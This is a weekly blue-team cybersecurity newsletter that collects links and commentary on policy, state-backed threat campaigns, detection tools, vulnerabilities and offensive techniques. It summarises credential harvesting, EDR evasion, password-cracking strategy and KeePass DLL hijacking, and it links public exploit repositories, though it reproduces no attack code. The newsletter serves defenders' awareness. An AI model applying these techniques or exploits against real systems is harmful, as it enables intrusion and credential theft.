Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.

Operationally this week Lastpass released their ‘Recommended Actions for LastPass Business Administrators’ plus various router/firewall campaigns outed and finally a Jenkins remote code execution vulnerability which if exploited could lead to excitement in various supply chains.

In the high-level this week:

• Annual Threat Assessment of the US Intelligence Community - China, Russian, Iran and North Korea all get special cyber mentions including China probably currently represents the broadest, most active, and persistent cyber espionage threat to U.S. Government and private-sector networks. China’s cyber pursuits and its industry’s export of related technologies increase the threats of aggressive cyber operations against the U.S. homeland, suppression of the free flow of information in cyberspace—such as U.S. web content—that Beijing views as threatening to the CCP’s hold on power, and the expansion of technology-driven authoritarianism globally.

• Russia’s Cyber Tactics: Lessons Learned in 2022 — SSSCIP analytical report on the year of Russia’s full-scale cyberwar against Ukraine - the numbers are 🤯 - 1,148 critical and high-level incidents investigated and mitigated by CERT-UA in 2022

• Towards common understandings: the application of established IHL principles to cyber operations - ICRC using international law to try and drive better behaviors, this however requires countries / actors to observe/fear the consequences of said international law - ICRC legal advisers Kubo Mačák and Tilman Rodenhäuser provide concise explanations of when and how IHL – and especially its principles of humanity, necessity, distinction, and proportionality – apply to the use of information and communications technologies (ICTs) by States

• They thought loved ones were calling for help. It was an AI scam - if true then evidence that criminals are using AI voice generation for fraud - His voice-cloning nightmare started when his parents received a phone call from an alleged lawyer, saying their son had killed a U.S. diplomat in a car accident. Perkin was in jail and needed money for legal fees.

• USA 🇺🇸

  • Cybersecurity’s Third Rail: Software Liability - Some analysis on the point I highlighted last week.

  • Forget the regulatory red herring: Here’s what the National Cybersecurity Strategy is really telling us - While the strategy makes it clear the administration believes market forces require a regulatory push to advance this paradigm shift, the underlying message is earnest.

  • How will the US counter cyber threats? - The strategy’s greatest virtues might be its focus on the pressing need to grapple with market incentives driving insecurity and to reallocate responsibility for security.

  • EPA Cybersecurity for the Water Sector - EPA released a memorandum stressing the need for states to assess cybersecurity risk at drinking water systems to protect our public drinking water.

  • Health Care and Public Health Sector Cybersecurity Framework Implementation Guide Version 2 - by U.S. Department of Health and Human Services (HHS)

• Australia 🇦🇺

  • Australian Cyber and Infrastructure Security Centre - Critical Infrastructure Resilience Plan - provides the high-level policy direction that underpins Australia’s approach to critical infrastructure resilience.

  • Australia demands Russia crack down on cyber criminals - They are not a rule of law country and the thought that you can apply conventional law enforcement disciplines ... is completely naive.

  • Inside Australian Labor’s cybersecurity overhaul - digital ID is coming to Australia - “We want all Australian businesses to be able to protect themselves but also to protect their customers,” Albanese said. “And I don’t underestimate the challenge that we’re facing. This is an ever-evolving threat and it will need adaptation from us – from business and government – to make sure that we keep on top of this.”

  • Getting cybersecurity right requires a change of mindset - an in part cutting analysis of new strategy.

• China 🇨🇳

  • China plans to form a national data bureau - The bureau is expected to coordinate the sharing and development of the country’s data resources, with the aim of fostering a digital economy. 

  • Foreign govt-backed hackers 'biggest threat' to cybersecurity - says China with a straight face

• Europol - Germany and Ukraine hit two high-value ransomware targets - targeted suspected core members of the criminal group responsible for carrying out large-scale cyberattacks with the DoppelPaymer ransomware. 

• Federal Authorities Seize Internet Domain Selling Malware Used to Illegally Control and Steal Data from Victims’ Computers - NetWire disrupted..

• Spying by Mexico’s Armed Forces Brings Fears of a ‘Military State’ - human rights targeted with Pegasus.

• Israeli Firm Suspected of Illegally Selling Classified Spy Tech - A previously unknown Israeli cyberoffense firm is selling advanced spyware and digital surveillance technologies to foreign countries

• NSO Group co-founder emerges as new majority owner - Omri Lavie – the “O” in NSO Group, who in recent years has stepped back from day-to-day management – appears to have emerged as the company’s new majority owner.

• The Audit Log Wall of Shame - I’m not a fan of shaming organizations/people into doing the right thing as this does. It is mildly frustrating that security is a tax especially around audit logs. Viva Le free market… but with corporate responsibility please.

• How a Montenegrin Gang Used Open-Source Intelligence to Kill - Hitmen working for a criminal group active in Montenegro and Serbia used open-source intelligence techniques, poring over apartment listing sites, satellite images, and tourist photos posted online, to track down and kill the leader of a rival clan as he hid out in Greece.

• Ukraine Cyber War One Year On: An International Law Case Study - interesting conclusion - if these cyberattacks were not complementing and enabling military action on the ground, it’s likely states, international organisations and civil society actors would still be refraining from calling them out as acts of cyber war.

Reflections this week come from a meeting where money laundering detection in financial services was discussed. The thing I took away is that money laundering and cyber breach detect efficacy have similar root causes. A breach goes undetected often because of ineffective processes, capabilities, technical debt and business incentives to ensure efficacy. The reason are quite similar to why money laundering isn’t detected in the real-world..

On the interesting job/role front:

• US Army Cyber & Technology Careers - fascinating times these are being advertised in this manner.

• Sr. Director Analyst, Vulnerability Management and Penetration Testing at Gartner - Thanos a whole industry if you wish..

Enjoying this? don’t get via e-mail? Subscribe:

Think someone else would benefit? Share:

Share

Have a lovely Friday

Ollie

Cyber threat intelligence

Who is doing what to whom and how.

COBALT ILLUSION Masquerades as Atlantic Council Employee

Iran learns from North Korean tradecraft..

[We] are investigating suspicious activity reported via Twitter on February 24, 2023. Multiple individuals involved in Middle Eastern political affairs research tweeted that than an individual claiming to work for the U.S. Atlantic Council think tank had contacted them about contributing to an Atlantic Council report in progress. This individual used the name Sara Shokouhi

Multiple hallmarks of this activity suggest involvement of the Iranian COBALT ILLUSION threat group (also known as Charming Kitten, APT42, Phosphorous, TA453, and Yellow Garuda), which is suspected of operating on behalf of the Intelligence Organization of the Islamic Revolutionary Guard Corp (IRGC-IO) in Iran.

https://www.secureworks.com/blog/cobalt-illusion-masquerades-as-atlantic-council-employee

New HiatusRAT router malware covertly spies on victims

Interesting, not overly complex, but definitely a blind spot. End of life devices targeted by a rudimentary RAT. It is almost like our technical security debt is coming home to roost.

[We] identified another, never-before-seen campaign involving compromised routers. This is a complex campaign we are calling “Hiatus”. It infects business-grade routers and deploys two malicious binaries, including a Remote Access Trojan (RAT) we’re calling HiatusRAT, and a variant of tcpdump that enables packet capture on the target device.

The threat actors behind the Hiatus campaign primarily operationalized end-of-life DrayTek Vigor models 2960 and 3900 running an i386 architecture.

We enumerated command and control (C2) infrastructure associated with the activity and have identified at least 100 infected victims, predominately in Europe and Latin America.

https://blog.lumen.com/new-hiatusrat-router-malware-covertly-spies-on-victims/

Pandas with a Soul: Chinese Espionage Attacks Against Southeast Asian Government Entities

China’s latest implant framework outed. The initial access vector is basic malicious documents and social engineering.

• In late 2022, a campaign with an initial infection vector similar to previous Sharp Panda operations targeted a high-profile government entity in the region.

• While Sharp Panda’s previous campaigns delivered a custom and unique backdoor called VictoryDll, the payload in this specific attack is a new version of SoulSearcher loader, which eventually loads the Soul modular framework. Although samples of this framework from 2017-2021 were previously analyzed, this report is the most extensive look yet at the Soul malware family infection chain, including a full technical analysis of the latest version, compiled in late 2022.

• Although the Soul malware framework was previously seen in an espionage campaign targeting the defense, healthcare, and ICT sectors in Southeast Asia, it was never previously attributed or connected to any known cluster of malicious activity. Although it is currently not clear if the Soul framework is utilized by a single threat actor, based on our research we can attribute the framework to an APT group with Chinese origins.

• The connection between the tools and TTPs (Tactics, Techniques and Procedures) of Sharp Panda and the previously mentioned attacks in Southeast Asia might serve as yet another example of key characteristics inherent to Chinese-based APT operations, such as sharing custom tools between groups or task specialization, when one entity is responsible for the initial infection and another one performs the actual intelligence gathering.

https://research.checkpoint.com/2023/pandas-with-a-soul-chinese-espionage-attacks-against-southeast-asian-government-entities/

Suspected Chinese Campaign to Persist on SonicWall Devices, Highlights Importance of Monitoring Edge Devices

Daniel Lee, Stephen Eckles and Ben Read detail a campaign where the initial infection vector is unknown. But given the number of vulnerabilities in this product line and that this implant can persist over upgrades there was/is opportunity aplenty.

[We have] identified a suspected Chinese campaign that involves maintaining long term persistence by running malware on an unpatched SonicWall Secure Mobile Access (SMA) appliance. The malware has functionality to steal user credentials, provide shell access, and persist through firmware upgrades.

https://www.mandiant.com/resources/blog/suspected-chinese-persist-sonicwall

Love scam or espionage? Transparent Tribe lures Indian and Pakistani officials

Lukas Stefanko details a Pakistani campaign against India as well as their own people. Again a mobile capability disguised as a chat application in order to engage in romantic discourse. The scale of the victims is interesting, let alone the legal basis with which eSet used to access said data.

• This Transparent Tribe campaign mainly targets Indian and Pakistani citizens, possibly those with a military or political background.

• It distributed the Android CapraRAT backdoor via trojanized secure messaging and calling apps branded as MeetsApp and MeetUp; the backdoor can exfiltrate any sensitive information from its victims’ devices.

• These trojanized apps were available to download from websites posing as official distribution centers. We believe a romance scam was used to lure targets to these websites.

• Poor operational security around these apps exposed user PII, allowing us to geolocate 150 victims.

• CapraRAT was hosted on a domain that resolved to an IP address previously used by Transparent Tribe.

https://www.welivesecurity.com/2023/03/07/love-scam-espionage-transparent-tribe-lures-indian-pakistani-officials/

APT-C-56 (Transparent Tribe) Deploys Android System RlmRat, Linux System Poseidon New Component Disclosure

China reporting on Pakistani capability including their multi platform capabilities. The continued evolution and diversification away from Windows endpoints appears to be an increasing trend.

[We] have discovered new attack tools targeting Android, Windows, and Linux systems while tracking a mobile attack against India. By analyzing the attack methods and Based on the target of the attack and the traceability of the Windows system attack tools, we attribute this attack to the Transparent Tribal Organization .

In this attack, Transparent Tribes used phishing pages disguised as Indian National Scholarship Portal, Indian Army Welfare Education Society, etc. to steal specific user information. At the same time, information theft activities are carried out with the help of new attack tools of Android , Windows, and Linux systems, of which the Windows system includes two versions.

https://mp-weixin-qq-com.translate.goog/s/lvSraGnMsl3a1jEUubuvyw?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp

North Korea

Various bits of reporting on the Hermit Kingdom this week.

Stealing the LIGHTSHOW (Part One) — North Korea's UNC2970

The fake jobs campaigns and social engineering continue unbated. Word documents and macros are the order of the day.

[We have] been tracking a campaign targeting Western Media and Technology companies from a suspected North Korean espionage group tracked as UNC2970. In June 2022, During this operation, Mandiant observed UNC2970 leverage three new code families: TOUCHMOVE, SIDESHOW, and TOUCHSHIFT. [We] suspect UNC2970 specifically targeted security researchers in this operation. Following the identification of this campaign, [We] responded to multiple UNC2970 intrusions targeting U.S. and European Media organizations through spear-phishing that used a job recruitment theme and demonstrated advancements in the groups ability to operate in cloud environments and against Endpoint Detection and Response (EDR) tools.

UNC2970 is suspected with high confidence to be UNC577, also known as Temp.Hermit. UNC577 is a cluster of North Korean cyber activity that has been active since at least 2013. The group has significant malware overlaps with other North Korean operators and is believed to share resources, such as code and complete malware tools with other distinct actors. While observed UNC577 activity primarily targets entities in South Korea, it has also targeted other organizations worldwide.

https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970

Stealing the LIGHTSHOW (Part Two) — LIGHTSHIFT and LIGHTSHOW

Glorious reporting here on North Korean capability which uses various techniques and environment guard rails to thwart detection and analysis. Shows sophistication and understanding.

LIGHTSHIFT, is an in-memory only dropper. The LIGHTSHIFT dropper distributes a payload that Mandiant refers to as LIGHTSHOW.

LIGHTSHOW is a utility that makes use of two primary anti-analysis techniques used to hinder both dynamic and static analysis. To deter static analysis, LIGHTSHOW was observed being packed by VM-Protect. In an effort to thwart dynamic analysis, LIGHTSHOW is targeted to a specific host and requires a specific SHA256 hash corresponding to a specific computer name or the sample will not fully execute.

https://www.mandiant.com/resources/blog/lightshift-and-lightshow

RedEyes(ScarCruft) - 2023 CHM malware impersonating security mail of a domestic financial company

A light technical analysis of malicious .chm files in use by North Korea. Most organizations should be resilient against means.

[We] detected the distribution of CHM malware, which is believed to have been created by the RedEyes attack group (also known as APT37, ScarCruft), to domestic users.

https://asec-ahnlab-com.translate.goog/ko/48764/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp

CHM malware (Kimsuky) disguised questionnaires related to North Korea

Another team from North Korea appear to have adopted similar tradecraft. It is like they had a lunch and learn on offensive tradecraft. Note the use of password protected archives, as we have seen elsewhere.

[We] recently identified CHM malware that is presumed to have been produced by the Kimsuky group . The malware type is the same as the malware introduced in the ASEC blog and the Kimsuky group dissemination malware analysis report below, and aims to leak user information .

CHM files are distributed as attachments to e-mails in the form of compressed files . The original mail was disguised as a request for an interview about North Korea, and if the mail recipient accepts it, a compressed file with a password set is attached in reply .

https://asec-ahnlab-com.translate.goog/ko/48960/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp

Understanding the Context of Cyber Threats: Lessons from the Kimsuky Group Attack

Seongsu Park details a historic campaign from North Korea. It is described as sophisticated, noting the initial access tradecraft is malicious documents.

In early 2022, the Kimsuky group carried out a sophisticated cyber attack against defense, political, and North Korea-related individuals. The attack had a complicated infection process from the initial infection to exfiltration, and each stage shows the following characteristics:

https://sp4rk.medium.com/understanding-the-context-of-cyber-threats-lessons-from-the-kimsuky-group-attack-3d026c5629bc

Finding attempts to pretending to be reporters from the Ministry of Unification and Foreign Affairs of KBS

Seoul-Mok Yongjae details a campaign where media was impersonated.

An attempt was made to attempt hacking by impersonating a reporter for KBS, a public broadcaster in Korea . It was analyzed as an act of North Korea .

On the 7th, some people working in North Korea-related industries received an e-mail from a reporter from the Ministry of Unification and Foreign Affairs of KBS's news division .

https://www-rfa-org.translate.goog/korean/in_focus/nk_nuclear_talks/hacking-03082023084805.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp

Multi-Year Spearphishing Campaign Targets the Maritime Industry Likely for Financial Gain

Update on a historic campaign which is targeting the maritime industry with criminal intent. The campaign is using malicious attachments over email..

In May 2020 [we] published a report on phishing lures impersonating the maritime industry. This research offers new insights and update on the topic. The key takeaways of this research are:

• A single threat cluster is conducting a campaign that is almost certainly targeting the maritime industry to deliver remote access trojans (RATs).

• The campaign is likely financially motivated.

• It is likely the maritime industry will continue to be targeted with more convincing spearphishing emails in the long -term due to the readily available information about maritime vessels and the nature of the industry.

The campaign’s first spearphishing email was observed on the 21st  of October 2020 against a shipping company headquartered in Norway. The spearphishing email had a CAB file attached using the name of a maritime vessel in its filename. The CAB file contained a Windows executable file, which contained the executable for the RAT Agent Tesla.

https://blog.eclecticiq.com/multi-year-spearphishing-campaign-targets-the-maritime-industry-likely-for-financial-gain

PlugX malware being distributed as a vulnerability attack

South Korean reporting here. We could discuss who knew of these vulnerabilities in Chinese remote control applications given the disclosure requirements in China. Interesting they are being exploited in this way by apparently various actors using numerous implant frameworks.

[We] recently confirmed that PlugX malware is being installed through remote code execution vulnerability attacks on Sunlogin and AweSun, Chinese remote control programs.

Sunlogin's remote code execution vulnerability (CNVD-2022-10270 / CNVD-2022-03672) has been used in various attacks since the exploit code was released until recently. In the past, ASEC has disclosed in its blog that Sliver C2, XMRig coin miner and Gh0st RAT malware are being distributed through the Sunlogin RCE vulnerability. For reference, Gh0st RAT is also a malware developed in China, so it is a RAT malware mainly used by Chinese-based attackers.

AweSun is also a remote control program developed in China. Although specific vulnerabilities have not been confirmed, it is estimated that RCE vulnerabilities similar to Sunlogin have been disclosed. The same attackers also used the RCE exploit against AweSun as well as Sunlogin to install Sliver C2. Later, cases of installing Paradise ransomware using the same vulnerability attacks were also confirmed and disclosed on the blog.

https://asec-ahnlab-com.translate.goog/ko/48725/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp

The Cookies Parasite

Amir Shaked provides a cast iron example of a growing threat. This is where actors steal active session cookies in order to bypass the likes of MFA. How we mitigate this threat beyond backend analytics doing impossible journey tests is unclear to me right now.

The malware sends all browsers’ active cookies, and specifically looks for the following passwords and tokens: AutoFill, Passwords, Cookies, Cards, Atomic, Armory, Bytecoin, BitcoinCore, DashCore, Litecoin, Electrum, Zcash, Ethereum, Authy (2FA), FileZilla, NordVPN, Telegram, Discord, PSI, Wallet, Pidgin, Steam.

Malvertising in Google search results delivering stealers

Victoria Vlasova provides further insight into a topic discussed I’ve discussed on numerous occasions over the past couple of months. We can expect other threat actors to a) learn and b) target similar eco-systems/mechanisms on other platforms.

In recent months, we observed an increase in the number of malicious campaigns that use Google Advertising as a means of distributing and delivering malware. At least two different stealers, Rhadamanthys and RedLine, were abusing the search engine promotion plan in order to deliver malicious payloads to victims’ machines. They seem to use the same technique of mimicking a website associated with well-known software like Notepad++ and Blender 3D.

https://securelist.com/malvertising-through-search-engines/108996/

“StreamJacking” - Hijacking Hundreds of YouTube Channels Per Day Propagating Elon Musk Branded

Nati Tal details a threat I wasn’t familiar with and the fact that as-a-Service exists shows there is demand. It is an interesting dimension to criminal activity online.

“StreamJacking” is the latest evolution of a crypto scam circulating for several years now, this time as a complex campaign with hundreds of YouTube channels hijacked each day, pushing fake streams and scam pages that snitch Millions of USD worth of crypto funds in a pro-level of crypto laundering operation.

In this write-up, we will shine a light on YouTube channel hijacking As-A-Service, all without any significant response from YouTube and a lifetime of work by high-profile YouTubers with millions of followers lost for good.

https://labs.guard.io/streamjacking-hijacking-hundreds-of-youtube-channels-per-day-propagating-elon-musk-branded-730944bbbfe6

Discovery

How we find and understand the latent compromises within our environments.

Using Memory Analysis to Detect EDR-Nullifying Malware

Paul Rascagneres details how to use memory forensic to detect actor tradecraft which is used to disable EDR. Really robust and useful tradecraft here..

https://www.volexity.com/blog/2023/03/07/using-memory-analysis-to-detect-edr-nullifying-malware/

Azure Command Line Forensics - Host Based Artifacts

Lina Lau details how to extract forensics artefacts that allows the detection of misuse of tooling on AD FS servers and AD CS servers to abuse pass-through authentication or abuse identity federation.

https://www.inversecos.com/2023/03/azure-command-line-forensics-host-based.html

sherl0ck: Search email

Ben Wildee has released some awesome automation to allow you discover content across email at scale irrespective of language.

Search an entire directory of .eml email files for a word or phrase... in over 100 languages. You input the search phrase and it translates to the language you choose BEFORE searching to match the email language.

https://github.com/pronsSec/sherl0ck

ChopChopGo: Rapidly Search and Hunt through Linux Forensics Artifacts

Christian Magana brings an uplift in tradecraft for Linux threat hunting.

ChopChopGo inspired by Chainsaw utilizes Sigma rules for forensics artifact recovery, enabling rapid and comprehensive analysis of logs and other artifacts to identify potential security incidents and threats on Linux.

https://github.com/M00NLIG7/ChopChopGo

ETW Integrity Hunting Tip: Microsoft-Windows-Security-Auditing publisher

John Dwyer shows how you can hunt where ETW may of been interfered with. Hunting for this could be fruitful / terrifying if you get a hit.

One thing that I stumbled upon which I haven't seen before was if I messed with the registry key associated with Microsoft-Windows-Security-Auditing publisher, I could stop the security log from logging those pesky 4688s and 4624s even after a reboot without disabling the EventLog Service. In this case, our detection opportunity is now EID 1108 and 1107 (depending on the version of Windows) in the Security log.

So if you find those EID's in your environment, check Sec publisher registry key and make sure it hasn't been tampered with. Happy hunting, fam!

https://www.linkedin.com/posts/john-dwyer-xforce_threathunting-threatdetection-malware-activity-7038997228815867904-F8wj

Defence

How we proactively defend our environments.

WDAC blocking policy for Mandiant-mentioned BYOVD drivers

Will Dormann continues to evidence why Microsoft should just pay him a lot of money and have him come work for them. He has taken the Mandiant reporting and converted to a set of Windows Defender Application Control (WDAC) to a driver blocking policy.

gist.github.com/wdormann/f2daf3d503306bb4a974bef6911e7ee5

Vulnerability

Our attack surface.

SonicOS SSLVPN Improper Restriction of Excessive MFA Attempts Vulnerability

Only CVSS 4.3 - so won’t be fixed in most places

SonicOS SSLVPN improper restriction of excessive MFA attempts vulnerability allows an authenticated attacker to use excessive MFA codes.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0005

IBM HTTP Server shipped with IBM WebSphere Remote Server

CVE-2022-28331, CVE-2022-36760, CVE-2022-37436, CVE-2022-25147, CVE-2006-20001 with no workarounds for vulnerabilities such as

Apache HTTP Server is vulnerable to HTTP request smuggling, caused by an inconsistent interpretation of HTTP Requests vulnerability in mod_proxy_ajp. An attacker could exploit this vulnerability to smuggle requests to the AJP server it

https://www.ibm.com/support/pages/node/6959691

Jenkins Server RCE

Chained vulnerabilities which opens the door to various supply chain attacks if exploited due to CI/CD environment access.

[We] have discovered a chain of vulnerabilities, dubbed CorePlague, in the widely used Jenkins Server and Update Center (CVE-2023-27898, CVE-2023-27905). Exploiting these vulnerabilities could allow an unauthenticated attacker to execute arbitrary code on the victim's Jenkins server, potentially leading to a complete compromise of the Jenkins server.

https://blog.aquasec.com/jenkins-server-vulnerabilities

A Vulnerability in Implementations of SHA-3, SHAKE, EdDSA, and Other NIST-Approved Algorithm

Nicky Mouha and Christopher Celi detail an implementation flow.

This paper describes a vulnerability in several implementations of the Secure Hash Algorithm 3 (SHA-3) that have been released by its designers. The vulnerability has been present since the final-round update of Keccak was submitted to the National Institute of Standards and Technology (NIST) SHA-3 hash function competition in January 2011, and is present in the eXtended Keccak Code Package (XKCP) of the Keccak team. It affects all software projects that have integrated this code, such as the scripting languages Python and PHP Hypertext Preprocessor (PHP).

https://eprint.iacr.org/2023/331

Polynonce: A Tale of a Novel ECDSA Attack and Bitcoin Tears

Nils Amiet details and attack and identify in the wild exploitation..

In a nutshell, the attack looks at the fact that you can always define a recurrence relation among nonces used in different ECDSA signatures as a polynomial of arbitrarily high degree, with unknown coefficients, modulo the order of the curve’s generator point.

..

Although we didn’t recover Satoshi’s private key (we’d be throwing a party instead of writing this blog post), we could see evidence that someone had previously attacked vulnerable wallets with a different exploit and drained them

https://research.kudelskisecurity.com/2023/03/06/polynonce-a-tale-of-a-novel-ecdsa-attack-and-bitcoin-tears/

Offense

Attack capability, techniques and trade-craft.

Building a Password Recovery Queue

Oleg Afonin starts to outline optimization strategies for password attacks which is a really fascinating area.

In this article we’ll discuss the process of building a password recovery queue. Learn how to choose the appropriate workflow for the attack, the first prioritizing files with weaker protection, the second prioritizing faster and shorter attacks, and the third being a combination of the two. For your reference, we built a table to compare the relative strength of different file formats and encryption methods, helping users prioritize their attack queues.

https://blog.elcomsoft.com/2023/03/building-a-password-recovery-queue/

A Word About Dictionaries (for optimal password cracking)

Oleg Afonin follows-up with showing how to organize ones dictionaries for optimal attacks.

A dictionary can be optimized to increase the probability of finding a password at the beginning of the attack. One way to optimize a dictionary is using a specific order of word entries. For example, one may place the most commonly used words at the top of the list (e.g. English Word Frequency | Kaggle), while less frequently used words could be placed lower down the list.

https://blog.elcomsoft.com/2023/03/a-word-about-dictionaries/

Harvesting Active Directory credentials via HTTP Request Smuggling

A somewhat complex yet interesting attack. The persistent OWA stuff is of nightmares.

[We describe] an HTTP Request Smuggling (HRS) vulnerability that we identified during one of our engagements. It can be used to simulate exploiting public-facing services while gaining an initial foothold within the network of a customer. In our case it allowed us to harvest Active Directory credentials which we used to sign into Outlook Web Access (OWA) to view sensitive data.

Afterwards, this blog post will go on to describe how to gain persistent access to OWA by migrating clients to a rogue man-in-the-middle Exchange server.

https://tij.me/blog/harvesting-active-directory-credentials-via-http-request-smuggling/

Obfuscating Rubeus using Codecepticon

Pavel Tsakalidis evidences the level of protection that a lot of EDR solution provide and frankly how fragile they are.

This post will provide a walkthrough on how to bring Rubeus' VirusTotal detections from 50/70 to 16/70 without much effort.

That’s right… commodity capability + tool == cratered.

https://www.pavel.gr/blog/obfuscating-rubeus-using-codecepticon

Having fun with KeePass2: DLL Hijacking and hooking APIs

In short it is possible, so don’t have implants on your boxes and you’ll be fine.

My goal was to see if I could find a way to intercept the Master Password of a KeePass2 database.
..

https://skr1x.github.io/keepass-dll-hijacking/

Timeroasting, trustroasting and computer spraying: taking advantage of weak computer and trust account passwords in Active Directory

Tom Tervoort gives further weight to why on premises Active Directory should be deprecated.

Attack tool authors have so far been ignoring these accounts, as attempting to guess their passwords seemed to be a waste of time. It turns out, however, that these types of passwords always being unguessable is a false assumption in practice: there are actually several situations in which computer or trust accounts can have highly predictable passwords, and we encountered this in a number of organizational domains.

In domains where weak dollar account passwords are present, these techniques can provide new (stealthy) methods of initial access and additional avenues for lateral movement and privilege escalation within AD environment

https://www.secura.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf

https://github.com/SecuraBV/Timeroast

Exploitation

What is being exploited.

CVE-2023-21839: Weblogic RCE

Chinese exploit..

https://github.com/4ra1n/CVE-2023-21839

CVE-2023-21768: LPE exploit for Windows

American exploit..

https://github.com/xforcered/Windows_LPE_AFD_CVE-2023-21768

Tooling and Techniques

Low level tooling and techniques for attack and defence researchers…

Capture SSL/TLS text content without CA cert using eBPF. supports Linux/Android x86_64/Aarch64

Chinese tooling which could easily pivot / be transferred to an implant.

https://github.com/gojue/ecapture

Exphash: Identifying Malicious DLLs With Export Hashing

from Lloyd Davies giving another actor/capability tracking edge.

Export Hashing (”exphash”), inspired by imphash, is a SHA-256 hash of ordinal-ordered export names in PEs. Tracking DLLs which are used in search-order hijacking can sometimes be tricky.

Due to the way that Export Hashes are calculated, we can use this to identify related malware samples. An Export Hash is a powerful way to to do this, as they are relatively unique in terms of the ordinal and exported function name within the Export Address Table (EAT). I have been using this technique for a while now in my personal malware analysis pipeline, with great results!

https://blog.syscall.party/2023/03/03/introducing-exphash-for-dll-clustering

Footnotes

Some other small (and not so small) bits and bobs which might be of interest.

• Mobile cyberthreat report for 2022 - 1,661,743 malicious installers, 196,476 new mobile banking Trojans and 10,543 new mobile ransomware Trojans

• The Red Report 2023 - based on an in-depth analysis of over

  500,000 real-world malware samples collected from a wide range of sources.

• 2022 Year in Review: The DFIR Report - Our data show no significant change compared to our 2021’s “Year in review” report. The tactics, techniques and procedures have mostly stayed the same as the motivations behind the attacks drive the resulting outcomes. Deploying ransomware and exfiltrating sensitive data was the primary goal for most intrusions we reported. The “smash-and-grab” ransomware operations continue to impact organizations of any size.

• Threat landscape for industrial automation systems for H2 2022 - dubious value in this data.

• JSAC2023 Event Report - includes links to some English as well as Japanese material for the talks given

• NDSS Symposium 2023 Program - some excellent papers from academia here.

• There Is No Such Thing as Open Source Intelligence - This article argues that “open source intelligence (OSINT)” is a fundamentally incoherent concept that should be abandoned. It does so in two steps. First, by challenging the underlying criteria used to demarcate it as a separate “INT” among its more traditional peers. Second, through a historical critique that argues that “OSINT” as a conceptual category served a transitionary stage that has long passed.

• Open-ended Working Group on security of and in the use of information and communications technologies (OEWG) - Chair’s letter from March 3rd

• Efficiency, Equity, Quality And Security In International (Academic) Research - In its report, ARMA found that whilst the majority of research organisations have made progress in responding to the Trusted Research and security agenda, there are unique challenges relating to the complexity and cross-cutting nature of the legislation which make this different to other forms of due diligence.

• Evaluating Escalation: Conceptualizing Escalation in an Era of Emerging Military Technologies - I introduce a means-based framework for characterizing escalation based on the degree to which actions are physically present and visible. Drawing from an original survey fielded on a cross-national sample of foreign policy experts, I construct a more complete escalation ladder in which more physically present and visible actions fall at higher rungs. This ladder suggests the need for more precise coding schemes than those found in widely cited militarized dispute datasets.

• Opted Out, Yet Tracked: Are Regulations Enough to Protect Your Privacy? - Our results indicate that user data is unfortunately still being collected, processed, and shared even when users opt-out. Our findings suggest that several prominent advertisers (e.g., AppNexus, PubMatic) might be in potential violation of GDPR and CCPA. Overall, our work casts a doubt if regulations are effective at protecting users' online privacy.

• Computational Language Acquisition with Theory of Mind - We find that training speakers with a highly weighted ToM listener component leads to performance gains in our image referential game setting. We also find some evidence that increasing task difficulty in the training process results in more fluent and precise utterances in evaluation. This suggests the potential utility of further incorporating ToM, as well as other insights from child language acquisition, into computational models of language acquisition.

• How to avoid machine learning pitfalls: a guide for academic researchers - This document is a concise outline of some of the common mistakes that occur when using machine learning, and what can be done to avoid them

• CISA Red Team Shares Key Findings to Improve Monitoring and Hardening of Networks - Despite having a mature cyber posture, the organization did not detect the red team’s activity throughout the assessment, including when the team attempted to trigger a security response - story of every red team ever..

This newsletter is produced by BinaryFirefly, it is via BinaryFirefly I support a hand picked set of organisations across investment, strategy and capability in the domain of cyber.

For sponsorship enquiries regarding Bluepurple or anything else contact hello@binaryfirefly.com.